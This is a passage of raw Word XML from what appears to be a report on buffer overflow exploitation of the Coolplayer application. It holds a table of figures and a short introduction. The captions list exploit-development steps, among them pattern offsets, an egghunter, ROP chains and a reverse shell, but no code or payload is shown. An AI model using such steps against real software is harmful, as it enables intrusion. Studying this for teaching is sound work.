            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BAC4FB3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564038" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 2 - EIP Example</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564038" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C7A63AF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564039" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 3 - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>OllyDebug</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve"> Attach</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564039" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E4F32B9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564040" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 4 - Selecting </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Coolplayer</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564040" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F59D0AD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564041" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 5 – Overflow EIP Value</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564041" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73A76538" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564042" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 6 - Overflown Buffer</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564042" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77E31684" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564043" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 7 - Pattern Create Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564043" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DE3CBD9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564044" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 8 - Pattern EIP Value</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564044" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07103474" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564045" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 9 - Pattern Offset Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564045" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13B8F9D8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564046" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 10 - Find Jump Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564046" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A5593AF" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564047" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 11 - Pattern Create Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564047" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="000F6D9B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564048" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 12 - Excerpt of Crashspace.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564048" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AEC7C4B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564049" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 13 - End of Stack</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564049" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D6930CD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564050" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 14 - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Searchbox</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564050" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>7</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1781EAC9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564051" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 15 - Character Filtration Comparison</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564051" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E18F157" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564052" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 16 - Message Box</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564052" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DEF8C05" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564053" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 17 - Show Options</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564053" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79DB6791" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564054" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 18 - Listener</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564054" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71211804" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564055" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 19 - Reverse Shell Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564055" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>11</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DA3327D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564056" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 20 - Command Line Access</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564056" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>12</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="18D4A195" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564057" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 21 - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Egghunter</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve"> Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564057" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>12</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30477F23" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564058" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 22 - Excerpt from Egghunter.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564058" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>13</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41E5296C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564059" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 23 - Mona Find Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564059" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>14</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0F72E78F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564060" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 24 - Excerpt of find.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564060" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>14</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="462A0BD3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564061" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 25 - Mona ROP Command</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564061" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>14</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5614844E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564062" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 26 - NULL Address</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564062" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C247854" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564063" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve">Figure 27 - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Ecerpt</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t xml:space="preserve"> from Ropchain.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564063" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E29201B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564064" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 28 - ROP Chain Message Box</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564064" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:tab/>
          <w:t>15</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AC193BD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4D6AAB" w14:textId="77777777" w:rsidR="00AD2FFF" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:sectPr w:rsidR="00AD2FFF">
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2801CDA8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc71563994"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="683B6DF6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc71563995"/>
      <w:r>
        <w:t>Background</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4AF65E98" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buffer overflows are a type of exploit that are simple in theory but can be complex in practice. The theory behind this exploit is based around the buffer that programs use to hold information. This buffer consists of temporary storage that can hold a limited amount of information. When information greater than the size of the buffer is submitted this creates a buffer overflow, as demonstrated in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71473224 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 1- Buffer Overflow Example</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. (What is Buffer Overflow, 2021)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9350" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="923"/>
        <w:gridCol w:w="933"/>
        <w:gridCol w:w="912"/>
        <w:gridCol w:w="913"/>
        <w:gridCol w:w="984"/>
        <w:gridCol w:w="946"/>
        <w:gridCol w:w="927"/>
        <w:gridCol w:w="939"/>
        <w:gridCol w:w="940"/>
        <w:gridCol w:w="933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="4C915B91" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="747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7BA18" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
